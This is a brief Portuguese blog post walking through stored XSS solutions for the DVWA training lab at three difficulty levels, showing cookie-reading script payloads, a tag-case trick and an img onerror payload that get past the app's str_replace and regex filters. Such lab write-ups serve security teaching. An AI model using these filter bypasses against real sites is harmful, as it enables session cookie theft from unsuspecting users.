DVWA Solution — Stored Cross Site Scripting (XSS)

Rafael Renovaci
1 min readApr 9, 2019

--

Low

Sem verificação, injeção direta

<script>alert(document.cookie)</script>

Medium

Ao visualizarmos o código-fonte vemos que o mesmo filtrar a tag <script>

$name = str_replace( '<script>', '', $name );

A vulnerabilidade agora esta no campo de “name”, porem não temos espaço suficiente temos que editar o campo e aumentar o tamanha da variável “maxlength” para 100 por exemplo.

Vamos tambem ignorar o filtro alterando o sensitivo das letras da tag. E voce conseguira executar o XSS.

<Script>alert(document.cookie)</script>

High

Neste nível a aplicação faz um filtro em todos os itens enviados da Tag.

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

Podemos então mudar o método de captura do cookie, não podemos esquecer de aumentar o tamanho de caracteres permitidos no campo, conforme o item Medium.

<img src=1 onerror=alert(document.cookie)>

--

--